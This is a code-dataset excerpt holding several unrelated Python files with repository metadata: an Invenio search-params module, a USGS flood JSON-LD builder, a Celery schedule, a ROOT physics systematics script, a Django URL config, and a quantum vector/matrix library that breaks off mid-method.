| 34.33704 | 150 | 0.555605 | 4,153 | 40,140 | 5.348904 | 0.152661 | 0.003421 | 0.036283 | 0.010084 | 0.329072 | 0.267669 | 0.245026 | 0.224858 | 0.205951 | 0.19042 | 0 | 0.030765 | 0.306029 | 40,140 | 1,168 | 151 | 34.366438 | 0.766334 | 0.04285 | 0 | 0.321897 | 0 | 0.001009 | 0.120394 | 0.01243 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.004036 | 0.020182 | null | null | 0.012109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c58a0d52b8cef211264dbb50ca9899b22373ef3 | 632 | py | Python | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | invenio_records_resources/services/records/params/__init__.py | jrcastro2/invenio-records-resources | a9760846080bfa1da4ed55c6f5b1f7bb96acd0b5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Search parameter interpreter API."""
from .base import ParamInterpreter
from .facets import FacetsParam
from .filter import FilterParam
from .pagination import PaginationParam
from .querystr import QueryParser, QueryStrParam
from .sort import SortParam
__all__ = (
'FacetsParam',
'FilterParam',
'PaginationParam',
'ParamInterpreter',
'QueryParser',
'QueryStrParam',
'SortParam',
)
| 23.407407 | 76 | 0.727848 | 71 | 632 | 6.422535 | 0.71831 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009579 | 0.174051 | 632 | 26 | 77 | 24.307692 | 0.863985 | 0.375 | 0 | 0 | 0 | 0 | 0.224543 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c5cf1c2f2bcf20985787c9b1a6a054234532e3c | 4,651 | py | Python | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 3 | 2021-04-16T04:24:40.000Z | 2022-02-11T22:17:14.000Z | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 22 | 2017-06-19T15:05:08.000Z | 2022-02-14T22:15:04.000Z | floodviz/linked_data_utils.py | USGS-VIZLAB/active-flood-viz | fff04a5703967969aa8d01a5f67fe95772ea4aec | [
"CC0-1.0"
] | 8 | 2017-06-19T13:59:23.000Z | 2017-07-10T20:40:10.000Z | from datetime import date
class LinkedData:
    """
    Generates schema.org JSON-LD describing a flood event and its gages.
    """
    def __init__(self):
        self.ld = self._blank_thing("WebSite")
        self.ld.update({
            "name": "Active flood visualization placeholder name",
            "datePublished": str(date.today()),
            "publisher": {
                "@context": "http://schema.org",
                "@type": "Organization",
                "name": "U.S. Geological Survey",
                "alternateName": "USGS"
            },
        })
        self.gages = []
        self.dates = {}
        self.location = []
    @staticmethod
    def _blank_thing(typename):
        """
        Return a minimal schema.org node of the given type.
        :param typename: Typename for the thing
        :return: Dict representing a blank thing
        """
        return {"@context": "http://schema.org", "@type": typename}
    def _location_str(self):
        """
        Render the event bounding box as a schema.org GeoShape box string.
        :return: String 'minlat,minlon maxlat,maxlon'
        """
        south, west, north, east = self.location
        return "{},{} {},{}".format(south, west, north, east)
    def _assemble_event(self):
        """
        Build the flood event node.
        :return: JSON-LD-like dict representing the event
        """
        event = self._blank_thing("Event")
        if not (self.location and self.dates):
            return event
        geo = self._blank_thing("GeoShape")
        geo["box"] = self._location_str()
        place = self._blank_thing("Place")
        place["address"] = "null"
        place["geo"] = geo
        event.update({
            "@context": "http://schema.org",
            "@type": "Event",
            "name": "FLOOD EVENT NAME",
            "startDate": self.dates['start'],
            "endDate": self.dates['end'],
            "location": place,
        })
        return event
    def _assemble_gage(self, gage):
        """
        Wrap a single gage record as a schema.org Place.
        :param gage: the gage to be wrapped
        :return: A dict representing the gage in json-ld format as a place
        """
        coords = self._blank_thing('geoCoordinates')
        coords["longitude"] = gage['dec_long_va']
        coords["latitude"] = gage['dec_lat_va']
        place = self._blank_thing('Place')
        place["address"] = "HUC:" + gage['huc_cd']
        place["name"] = gage['station_nm']
        place["branchCode"] = "SITE:" + gage['site_no']
        place["geo"] = coords
        place["additionalProperty"] = {
            "huc_cd": gage['huc_cd'],
            "site_no": gage['site_no']
        }
        return place
    def _assemble_all_gages(self):
        """
        Wrap every stored gage as a Place.
        :return: A list of dicts describing the gages
        """
        if not self.gages:
            return []
        return [self._assemble_gage(g) for g in self.gages]
    def set_page_name(self, name):
        self.ld['name'] = name
    def set_gages(self, gages):
        """
        Sets the gages to be used
        :param gages: list of dicts describing gages as output by `site_dict` in map_utils.
        :return: None
        """
        self.gages = gages
    def set_dates(self, start, end):
        """
        Sets the start and end dates of the flood event
        :param start: Start date
        :param end: End date
        :return: None
        """
        self.dates = {"start": start, "end": end}
    def set_location(self, bbox):
        """
        Sets the bounding box of the event
        :param bbox: array containing two pairs of coordinates
        :return: None
        """
        lons = (bbox[0], bbox[2])
        lats = (bbox[1], bbox[3])
        self.location = [min(lats), min(lons), max(lats), max(lons)]
    def assemble(self):
        """
        Put together all data
        :return: return a JSON-LD-like dictionary
        """
        self.ld['about'] = self._assemble_event()
        self.ld['gages'] = self._assemble_all_gages() if self.gages else []
        return self.ld
| 29.624204 | 104 | 0.488927 | 493 | 4,651 | 4.505071 | 0.27789 | 0.043224 | 0.038271 | 0.045025 | 0.076542 | 0.022512 | 0 | 0 | 0 | 0 | 0 | 0.002805 | 0.386799 | 4,651 | 156 | 105 | 29.814103 | 0.775947 | 0.212427 | 0 | 0.114583 | 1 | 0 | 0.171084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114583 | false | 0 | 0.010417 | 0 | 0.197917 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c67075d9a02f5436a7386d8c0f32d76899c0dc6 | 1,342 | py | Python | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | null | null | null | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | null | null | null | src/prodstats/cq/__init__.py | la-mar/prodstats | 4ff5a6e0b0d6152af2d7e1f3844ede2d33ad4824 | [
"MIT"
] | 1 | 2021-01-05T18:58:08.000Z | 2021-01-05T18:58:08.000Z | # flake8: noqa
import functools
import logging
from celery.schedules import crontab
import config as conf
import cq.signals
import cq.tasks as tasks
import db
import loggers
from const import HoleDirection, IHSPath
from cq.worker import celery_app
logger = logging.getLogger(__name__)
@celery_app.on_after_configure.connect
def setup_periodic_tasks(sender, **kwargs):
add_task = functools.partial(sender.add_periodic_task)
add_task(30, tasks.post_heartbeat.s(), name="heartbeat")
# add_task(15, tasks.log.s(), name="log-check")
add_task(
crontab(minute=50, hour="*/3"),
tasks.sync_area_manifest.s(),
name="sync_area_manifest",
)
# add_task(60, tasks.run_driftwood.s(HoleDirection.H), name="run_driftwood_h")
# add_task(
# 60, tasks.run_driftwood.s(HoleDirection.V, batch_size=2), name="run_driftwood_v"
# )
add_task(
crontab(minute=0, hour="*/1"),
# 15,
tasks.run_next_available.s(HoleDirection.H),
name="run_next_h",
)
# add_task(
# crontab(minute=30, hour="*/2"),
# tasks.run_next_available.s(HoleDirection.V, batch_size=2),
# name="run_next_v",
# )
add_task(
crontab(minute=0, hour=4),
tasks.sync_known_entities.s(HoleDirection.H),
name="sync_known_entities_h",
)
| 26.84 | 90 | 0.670641 | 184 | 1,342 | 4.63587 | 0.358696 | 0.073857 | 0.065651 | 0.093787 | 0.297773 | 0.279015 | 0.213365 | 0.152403 | 0 | 0 | 0 | 0.021475 | 0.201937 | 1,342 | 49 | 91 | 27.387755 | 0.774977 | 0.275708 | 0 | 0.1 | 0 | 0 | 0.066736 | 0.021898 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.333333 | 0 | 0.366667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c6c2c785d2c2f358098daac5406d05ec819f892 | 6,030 | py | Python | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | zprime_search/python/Systematics.py | cdragoiu/particle_physics | 1814ea2f072ccfbf1412397b19a3b5dad7ddb639 | [
"MIT"
] | null | null | null | import math, ROOT, sys
from PlotStyle import *
# estimate systematics -----------------------------------------------------------------------------
def GetSys(basePath, baseRunType, sysPath, sysRunType, N, ybin):
if 'ele' in baseRunType:
data = 'DoubleElectron'
elif 'hf' in baseRunType:
data = 'SingleElectron'
dirs = []
for i in range(N):
if 'pdf' in sysRunType:
dirs.append(sysRunType + '_' + str(i+1) + '/')
else:
dirs.append(sysRunType + '_max_' + str(i+1) + '/')
dirs.append(sysRunType + '_min_' + str(i+1) + '/')
if N == 0:
dirs.append('')
histName = 'afb_' + ybin + '_noBkg_unf'
fileB = ROOT.TFile.Open(basePath + 'histograms_' + baseRunType + '_' + data + '.root')
histB = fileB.Get(histName)
histP = histB.Clone('histP')
histP.Reset()
histM = histB.Clone('histM')
histM.Reset()
file = ROOT.TFile.Open(sysPath + 'histograms_' + sysRunType + '_' + data + '.root')
if 'sysNnpdf' in sysRunType:
hists = []
for b in range(2, histB.GetNbinsX()):
hists.append(ROOT.TH1D('sys_'+str(b), '', 1000, -0.5, 0.5))
for dir in dirs:
hist = file.Get(dir + histName)
hist.Add(histB, -1.0)
for b in range(2, histB.GetNbinsX()):
hists[b-2].Fill(hist.GetBinContent(b))
for b in range(2, histB.GetNbinsX()):
sys = hists[b-2].GetRMS()
histP.SetBinContent(b, sys)
histM.SetBinContent(b, -sys)
else:
for dir in dirs:
hist = file.Get(dir + histName)
hist.Add(histB, -1.0)
for b in range(2, histB.GetNbinsX()):
sys = hist.GetBinContent(b)
if sys > 0.0:
sysP = histP.GetBinContent(b)
histP.SetBinContent(b, math.sqrt(math.pow(sysP,2)+math.pow(sys,2)))
else:
sysM = histM.GetBinContent(b)
histM.SetBinContent(b, -math.sqrt(math.pow(sysM,2)+math.pow(sys,2)))
file.Close()
if 'sysCt10pdf' in sysRunType:
for b in range(2, histB.GetNbinsX()):
sys = (histP.GetBinContent(b) - histM.GetBinContent(b)) / 2
histP.SetBinContent(b, sys)
histM.SetBinContent(b, -sys)
for b in range(2, histB.GetNbinsX()):
sysP = histP.GetBinContent(b)
sysM = histM.GetBinContent(b)
if -sysM < 0.5*sysP:
histM.SetBinContent(b, -sysP)
elif sysP < -0.5*sysM:
histP.SetBinContent(b, -sysM)
fileS = ROOT.TFile.Open(sysPath + 'systematics_' + sysRunType + '.root', 'update')
fileS.cd()
histP.Write('sys_max_' + ybin, 6)
histM.Write('sys_min_' + ybin, 6)
fileS.Close()
fileB.Close()
# plot systematics ---------------------------------------------------------------------------------
def PlotSys(basePath, baseRunType, sysPath, sysRunType, ybin):
if 'ele' in baseRunType:
data = 'DoubleElectron'
xmax = 2000.0
lx1 = 0.4
elif 'hf' in baseRunType:
data = 'SingleElectron'
xmax = 320.0
lx1 = 0.1
fileB = ROOT.TFile.Open(basePath + 'histograms_' + baseRunType + '_' + data + '.root')
histB = fileB.Get('afb_' + ybin + '_noBkg_unf')
histErrP = histB.Clone('histErrP')
histErrM = histB.Clone('histErrM')
for b in range(2, histB.GetNbinsX()):
err = histB.GetBinError(b)
histErrP.SetBinContent(b, err)
histErrM.SetBinContent(b, -err)
fileS = ROOT.TFile.Open(sysPath + 'systematics_' + sysRunType + '.root')
histP = fileS.Get('sys_max_' + ybin)
histM = fileS.Get('sys_min_' + ybin)
canvas = ROOT.TCanvas('canvas', '', 440, 130, GetW(), GetH('S'))
SetCanvas(canvas, 'S')
canvas.SetLogx()
ROOT.gStyle.SetHistMinimumZero()
for hist in [histErrP, histErrM, histP, histM]:
hist.SetBarWidth(1.0)
hist.SetBarOffset(0.0)
hist.GetXaxis().SetRangeUser(40.0, xmax)
for hist in [histErrP, histErrM]:
hist.SetFillColor(ROOT.kGray)
hist.SetFillStyle(1001)
for hist in [histP, histM]:
hist.SetFillColor(ROOT.kRed)
hist.SetFillStyle(3001)
histErrP.SetStats(0)
histErrP.Draw('hist bar')
for hist in [histErrM, histP, histM]:
hist.Draw('same hist bar')
histErrP.Draw('same axis')
SetAxes(histErrP, 'S')
histErrP.GetXaxis().SetTitle('M(ee)')
ymax = 1.5 * max(histErrP.GetMaximum(), -histErrM.GetMinimum())
histErrP.GetYaxis().SetRangeUser(-ymax, ymax)
legendErr = ROOT.TLegend(lx1, 0.02, lx1+0.08, 0.08)
SetLegend(legendErr, 'S')
legendErr.AddEntry(histErrP, ' STAT', 'f')
legendErr.Draw('same')
legend = ROOT.TLegend(lx1+0.12, 0.02, lx1+0.20, 0.08)
SetLegend(legend, 'S')
legend.AddEntry(histP, ' SYS', 'f')
legend.Draw('same')
canvas.Update()
raw_input('...')
# run as the main program only ---------------------------------------------------------------------
if __name__ == '__main__':
if len(sys.argv) not in [6,7]:
cmd = sys.argv[0]
print 'usage:'
print ' get SYS : ' + cmd + ' basePath baseRunType sysPath sysRunType iterations ybin'
print ' plot SYS: ' + cmd + ' basePath baseRunType sysPath sysRunType ybin'
print ' basePath = path to base histograms'
print ' baseRunType = runZprime runType list (NO qcd, unf)'
print ' sysPath = path to systematic histograms'
print ' sysRunType = runZprime runType list (NO qcd, unf)'
print ' iterations = number of systematic variations'
print ' ybin = 0y1, 1y1p25, 1p25y1p5, 1p5y2p4, 2p4y5'
sys.exit()
if len(sys.argv) == 7:
GetSys(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], int(sys.argv[5]), sys.argv[6])
else:
PlotSys(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])
| 41.586207 | 100 | 0.550415 | 708 | 6,030 | 4.635593 | 0.241525 | 0.02986 | 0.012797 | 0.023461 | 0.353748 | 0.319013 | 0.253199 | 0.19287 | 0.106033 | 0.106033 | 0 | 0.031414 | 0.271476 | 6,030 | 144 | 101 | 41.875 | 0.715684 | 0.049088 | 0 | 0.253623 | 0 | 0 | 0.148866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.014493 | null | null | 0.065217 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5c6f6066b3c7cb622e5718a9e9136600fd2f5a6b | 375 | py | Python | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | src/api/urls.py | rjuppa/onepip | dd8de82ba58f5f192792fa21b466f9726227e0c5 | [
"MIT"
] | null | null | null | from django.conf.urls import url, include
from rest_framework import routers
from . import views
# Routers provide an easy way of automatically determining the URL conf.
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
urlpatterns = [
url(r'^prices/(?P<mid>[0-9]+)/$', views.PriceList.as_view()),
url(r'^', include(router.urls)),
]
| 22.058824 | 72 | 0.72 | 52 | 375 | 5.153846 | 0.653846 | 0.029851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006192 | 0.138667 | 375 | 16 | 73 | 23.4375 | 0.823529 | 0.186667 | 0 | 0 | 0 | 0 | 0.10299 | 0.083056 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
5c73899f8a7a4e6cae0196f83d72e8c2a0f1bcf4 | 18,505 | py | Python | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | 1 | 2019-12-04T13:45:14.000Z | 2019-12-04T13:45:14.000Z | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | null | null | null | logiq/src/Qmath.py | Bnz-0/logiq | 5b7c4cf894f00aa5648192f9c4bece6a45c9f894 | [
"MIT"
] | null | null | null | from random import random, sample
from .Qerrors import DimensionError, GenericLogiqError, InitializationError
from .qtils import equal, isScalar, math, mod_square, np
#### Qmath.py
#
# This file contains 2 classes that wrap the numpy.matrix class: the vector and the matrix class,
# it contains also other mathematical functions used in the classes.
# (In the future, these 2 classes could be refactored and became the subclasses of a superclass "linobj")
#
####
# ↓↓↓↓↓↓↓↓↓↓↓↓ Add the npm() method to the np.matrix class ↓↓↓↓↓↓↓↓↓↓↓↓ #
def _npm(self):
return self
setattr(np.matrix, 'npm', _npm)
# ↑↑↑↑↑↑↑↑↑↑↑↑ Add the npm() method to the np.matrix class ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Kronecker product functions ↓↓↓↓↓↓↓↓↓↓↓↓ #
def kron(m1, m2):
"Return the Kronecker product between `m1` and `m2` \n(`m1` and `m2` must be `vector` or `matrix`, otherwise they can be a `np.matrix`)"
try: npm1 = m1.npm() ; npm2 = m2.npm()
except AttributeError: raise TypeError("The types of the inputs must be vector or matrix")
return select_type(np.kron(npm1, npm2))
def nkron(m, n):
"Apply the Kronecker product `n` times: `(m @ m @ ... @ m)` for `n` times"
if n<1: return matrix((1)) #[[1]] @ x = x
out = m
for _ in range(n-1):
out = kron(out, m)
return out
# ↑↑↑↑↑↑↑↑↑↑↑↑ Kronecker product functions ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Other useful functions ↓↓↓↓↓↓↓↓↓↓↓↓ #
def select_type(item):
if len(item.shape) == 0:
return item
elif item.shape == (1,1):
return item[0,0] #scalar
elif min(item.shape) == 1:
return vector(item, no_cpy=True)#vector
else:
return matrix(item, no_cpy=True)#matrix
class npmath:
# Methods to use, safely, standard operators between scalars, vector, matrix and numpy.matrix
@staticmethod
def safe_npm(x):
try: return x if isScalar(x) else x.npm()
except: raise TypeError("'"+str(type(x))+"' is an invalid type")
@staticmethod
def _fun(x, y, fun):
return select_type( fun(npmath.safe_npm(x), npmath.safe_npm(y)) )
@staticmethod
def add(x, y):
return npmath._fun(x, y, lambda x,y: x+y)
@staticmethod
def sub(x, y):
return npmath._fun(x, y, lambda x,y: x-y)
@staticmethod
def mul(x, y):
return npmath._fun(x, y, lambda x,y: x*y)
@staticmethod
def div(x, y):
return npmath._fun(x, y, lambda x,y: x/y)
@staticmethod
def equal(x, y):
if isScalar(x) or isScalar(y): return x == y
try: x = x.npm() ; y = y.npm()
except: return False
return npmath.np_equal(x, y)
@staticmethod
def np_equal(x, y):
if x.shape != y.shape: return False
for i in range(x.shape[0]):
for j in range(x.shape[1]):
if x[i,j] != y[i,j]: return False
return True
# ↑↑↑↑↑↑↑↑↑↑↑↑ Other useful functions ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ vector class ↓↓↓↓↓↓↓↓↓↓↓↓ #
class vector:
"""
+ `v`: describes the value of this vector, it can be every kind of object allowed from `numpy.matrix` constructor, or another vector (in that case it will be copied)
+ `normalize` (optional): if True this vector will normalize (i.e. his norm became 1)
+ `values2round` (optional): a list where the value inside will be rounded for example if `values2round=[1]` and the vector is `[1.00001, 12.00001]` it becomes `[1, 12.00001]` (this according to the global precision)
"""
def __init__(self, v, normalize = False, values2round = None, no_cpy = False):
try:
if isinstance(v, (np.matrix, vector, matrix)):
self.vect = v.npm() if no_cpy else np.matrix(v.npm())
else:
self.vect = np.matrix(v, complex)
if min(self.vect.shape) != 1:
raise DimensionError('A vector must be have only one dimension')
except Exception as e:
raise InitializationError('Error to initialize the vector', e)
if normalize: self.normalize()
if values2round is not None: self.round_error(values2round)
def npm(self):
"""
Return the reference of the `numpy.matrix` associated
Watch out: it return the reference of the vector (for performance reason), so if you want to modify it first copy it.
"""
return self.vect
def isRow(self):
"`True` if the vector is a 'row vector'"
return self.vect.shape[0] == 1
def isCol(self):
"`True` if the vector is a 'column vector'"
return self.vect.shape[1] == 1
def round_error(self, values):
"""Round the error (using `equals()`) of values in `values`.\n
For example if `values = (0,1)` and this vector is `|5, 0.9999998>` it may became `|5, 1>`"""
for i in range(len(self)):
for v in values:
if equal(self[i], v):
self[i] = v
elif equal(self[i].real, 0) or equal(self[i].imag, 0):
self[i] = complex( 0 if equal(self[i].real, 0) else self[i].real, 0 if equal(self[i].imag, 0) else self[i].imag )
def norm(self):
"Return the norm of this vector, defined as `sqrt(<v|v>)`"
return math.sqrt(sum(mod_square(x) for x in self))
def normalize(self):
"Normalize this vector (i.e. his norm became 1)"
d = self.norm()
if d==0: raise DimensionError("The null vector isn't normalizable")
for i in range(len(self)):
self[i] /= d
return self
def __pos__(self):
return self
def __neg__(self):
return vector(self.vect.__neg__(), no_cpy=True)
def __len__(self):
return max(self.vect.shape)
def __getitem__(self, i):
try:
item = self.vect[0, i] if self.isRow() else self.vect[i, 0]
return vector(item) if isinstance(i, slice) else item
except IndexError:
raise IndexError("Index out of bound (i="+str(i)+" and vector's length = "+str(len(self))+")")
def __setitem__(self, i, value):
try:
if self.isRow(): self.vect[0, i] = value
else: self.vect[i, 0] = value
except IndexError:
raise IndexError("Index out of bound (i="+str(i)+" and vector's length = "+str(len(self))+")")
def _vector_op(self, v, fun):
#BUG: numpy.complex128 + v = np.array
if isinstance(v, vector):
if v.vect.shape != self.vect.shape: raise DimensionError("The vector's lengths must be equal")
return vector(fun(self.vect, v.vect), no_cpy=True)
elif isScalar(v):
return vector(fun(self.vect, v), no_cpy=True)
else: raise TypeError('Other member must be a vector or a scalar')
def __add__(self, v):
try:
return self._vector_op(v, lambda x,y: x+y)
except Exception as e:
raise GenericLogiqError('Unable to sum', e)
def __radd__(self, v):
try:
return self._vector_op(v, lambda x,y: y+x)
except Exception as e:
raise GenericLogiqError('Unable to sum', e)
def __sub__(self, v):
try:
return self._vector_op(v, lambda x,y: x-y)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __rsub__(self, v):
try:
return self._vector_op(v, lambda x,y: y-x)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __mul__(self, v):
npv = npmath.safe_npm(v)
return select_type(self.vect * npv)
def __rmul__(self, v):
npv = npmath.safe_npm(v)
return select_type(npv * self.vect)
def __truediv__(self, v):
npv = npmath.safe_npm(v)
return select_type(self.vect / npv)
def __rtruediv__(self, v):
npv = npmath.safe_npm(v)
return select_type(npv / self.vect)
def __matmul__(self, v):
if isinstance(v, int): return nkron(self, v)
return kron(self, v)
def __eq__(self, v):
if isinstance(v, (vector, matrix, np.matrix)):
return npmath.np_equal(self.vect, v.npm())
else:
return False
def __invert__(self): #conjugate transpose
return vector(self.vect.H)
def transpose(self):
"Transform this vector into its transpose"
self.vect = self.vect.T
def conj(self):
"Transform this vector into its conjugate transpose"
self.vect = self.vect.H
def __getattr__(self, name):
if name in 'tT': return vector(self.vect.T)
elif name in 'hH': return ~self
elif name == 'shape': return self.vect.shape
raise AttributeError("'vector' object has no attribute '"+name+"'")
def __hash__(self):
return hash(str(self.vect))
def __str__(self):
braket = "<|>"
i = self.isCol()
return braket[i] + "; ".join(str(self[i]) for i in range(len(self))) + braket[i+1]
def __repr__(self):
return str(self)
@staticmethod
def random(dim):
"Return a random complex vector long `dim`"
rsign = lambda: sample((1,-1), 1)[0]
return vector([complex(rsign()*random(), rsign()*random()) for _ in range(dim)])
# ↑↑↑↑↑↑↑↑↑↑↑↑ vector class ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ Useful vector constructors ↓↓↓↓↓↓↓↓↓↓↓↓ #
def roundedVector(v, values2round=(0,1,-1)):
"Generate a vector with the values in `values2round` rounded"
return vector(v, values2round=values2round)
class ket(vector):
"""A shortcut to create a column vector
Usage: `ket(x0, x1, ..., xn)`"""
def __init__(self, *values):
if len(values) == 1: values = values[0]
super().__init__(values)
if self.isRow():
if isinstance(values, vector): self.conj() #transformation from ket to bra
else: self.transpose() #no transformation, only creating a vector column
class bra(vector):
"""A shortcut to create a row vector
Usage: `bra(x0, x1, ..., xn)`"""
def __init__(self, *values):
if len(values) == 1: values = values[0]
super().__init__(values)
if self.isCol():
if isinstance(values, vector): self.conj() #transformation from ket to bra
else: self.transpose() #no transformation, only creating a vector column
# ↑↑↑↑↑↑↑↑↑↑↑↑ Useful vector constructors ↑↑↑↑↑↑↑↑↑↑↑↑ #
# ↓↓↓↓↓↓↓↓↓↓↓↓ matrix class ↓↓↓↓↓↓↓↓↓↓↓↓ #
class matrix:
"""
+ `M`: describes the value of this vector, it can be every kind of object allowed to `numpy.matrix` constructor, or another matrix (in that case it will be copied)
+ `values2round` (optional): a list where the value inside will be rounded, for example if `values2round=[1]` and the matrix is `[[1.00001, 12.00001],[0.3,1.12]]` it becomes `[[1, 12.00001],[0.3,1.12]]` (this according to the global precision)
"""
def __init__(self, M, values2round = None, no_cpy = False):
try:
if isinstance(M, (np.matrix, matrix, vector)):
self.mtx = M.npm() if no_cpy else np.matrix(M.npm())
else:
try:
if isinstance(M[0], ket):
M = [[M[j][i] for j in range(len(M))] for i in range(len(M[0]))]
except: pass
finally:
self.mtx = np.matrix(M, complex)
except Exception as e:
raise InitializationError('Error to initialize the matrix', e)
if values2round is not None: self.round_error(values2round)
def round_error(self, values):
"""Round the error (using `equals()`) of values in `values`.
For example if `values = (0,1)` and this matrix is `[[5, 0.9999998],[-0.000001, 0.1]]` it may became `[[5, 1],[0, 0.1]]`"""
for i in range(self.shape[0]):
for j in range(self.shape[1]):
for v in values:
if equal(self[i, j], v): self[i, j] = v
def isUnitary(self):
"`True` if this matrix is unitary"
return self.mtx.shape[0] % self.mtx.shape[1] == 0 and np.allclose(np.eye(self.mtx.shape[0]), self.mtx.H * self.mtx)
def isOrthonormal(self):
"`True` if this matrix is orthonormal"
_, r = np.linalg.qr(self.mtx)
for i in range(len(self)):
for j in range(i, len(self)):
if i==j: continue
elif not equal(r[i,j], 0):
return False
return True
def nomr(self):
"return the norm of this matrix"
return np.linalg.norm(self.mtx)
def det(self):
"Return the determinant of this matrix"
return np.linalg.det(self.mtx)
def npm(self):
"""
Return the reference of the `numpy.matrix` associated.
Watch out: it return the reference of the matrix (for performance reason), so if you want to modify it first copy it.
"""
return self.mtx
def __pos__(self):
return self
def __neg__(self):
return matrix(self.mtx.__neg__(), no_cpy=True)
def __getitem__(self, i):
try:
return select_type(self.mtx[i])
except IndexError:
raise IndexError("Index out of bound (request="+str(i)+", shape="+str(self.shape)+")")
def __setitem__(self, i, value):
self.mtx[i] = value
def _matrix_op(self, M, fun):
#BUG: numpy.complex128 + M = np.array
if isinstance(M, matrix):
if M.shape != self.shape: raise DimensionError("The matrices' shapes must be equal")
return matrix(fun(self.mtx, M.mtx), no_cpy=True)
elif isScalar(M):
return matrix(fun(self.mtx, M), no_cpy=True)
else: raise TypeError('Other member must be a matrix or a scalar')
def __add__(self, M):
try:
return self._matrix_op(M, lambda x,y: x+y)
except Exception as e:
raise GenericLogiqError('Unable to add', e)
def __radd__(self, M):
try:
return self._matrix_op(M, lambda x,y: y+x)
except Exception as e:
raise GenericLogiqError('Unable to add', e)
def __sub__(self, M):
try:
return self._matrix_op(M, lambda x,y: x-y)
except Exception as e:
raise GenericLogiqError('Unable to subtract', e)
def __rsub__(self, M):
try:
